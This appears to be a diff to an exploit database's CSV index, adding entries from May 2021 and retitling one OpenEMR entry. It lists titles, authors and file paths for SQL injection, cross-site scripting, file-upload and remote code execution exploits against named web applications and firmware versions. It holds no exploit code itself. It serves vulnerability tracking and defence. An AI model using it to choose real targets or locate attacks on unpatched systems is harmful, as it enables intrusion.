 44999,exploits/linux/webapps/44999.txt,"Elektronischer Leitz-Ordner 10 - SQL Injection",2018-07-10,"Jens Regel",webapps,linux,
 45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
 45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php,
-45161,exploits/php/webapps/45161.py,"OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution",2018-08-07,"Cody Zacharias",webapps,php,80
+45161,exploits/php/webapps/45161.py,"OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated)",2018-08-07,"Cody Zacharias",webapps,php,80
 45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,
 45065,exploits/hardware/webapps/45065.txt,"GeoVision GV-SNVR0811 - Directory Traversal",2018-07-22,"Berk Dusunur",webapps,hardware,
 45030,exploits/hardware/webapps/45030.txt,"VelotiSmart WiFi B-380 Camera - Directory Traversal",2018-07-16,"Miguel Mendez Z",webapps,hardware,80
@@ -44033,3 +44034,12 @@ id,file,description,date,author,type,platform,port
 49865,exploits/php/webapps/49865.txt,"Student Management System 1.0 - 'message' Persistent Cross-Site Scripting (Authenticated)",2021-05-14,"mohsen khashei",webapps,php,
 49866,exploits/php/webapps/49866.txt,"Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)",2021-05-14,"Ayşenur KARAASLAN",webapps,php,
 49867,exploits/php/webapps/49867.py,"Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)",2021-05-14,"M. Cory Billington",webapps,php,
+49868,exploits/php/webapps/49868.txt,"Customer Relationship Management (CRM) System 1.0 - 'Category' Persistent Cross site Scripting",2021-05-17,"Vani K G",webapps,php,
+49869,exploits/cgi/webapps/49869.py,"IPFire 2.25 - Remote Code Execution (Authenticated)",2021-05-17,"Mücahit Saratar",webapps,cgi,
+49870,exploits/php/webapps/49870.txt,"Dental Clinic Appointment Reservation System 1.0 - 'Firstname' Persistent Cross Site Scripting (Authenticated)",2021-05-17,"Reza Afsahi",webapps,php,
+49871,exploits/php/webapps/49871.txt,"Dental Clinic Appointment Reservation System 1.0 - Cross Site Request Forgery (Add Admin)",2021-05-17,"Reza Afsahi",webapps,php,
+49873,exploits/php/webapps/49873.txt,"Simple Chatbot Application 1.0 - 'Category' Stored Cross site Scripting",2021-05-17,"Vani K G",webapps,php,
+49874,exploits/php/webapps/49874.txt,"Billing Management System 2.0 - Union based SQL injection (Authenticated)",2021-05-17,"Mohammad Koochaki",webapps,php,
+49875,exploits/php/webapps/49875.txt,"Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS)",2021-05-17,"Abdulkadir AYDOGAN",webapps,php,
+49876,exploits/php/webapps/49876.py,"Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated)",2021-05-17,"Fellipe Oliveira",webapps,php,
+49877,exploits/php/webapps/49877.txt,"Printable Staff ID Card Creator System 1.0 - SQLi & RCE via Arbitrary File Upload",2021-05-17,bwnz,webapps,php,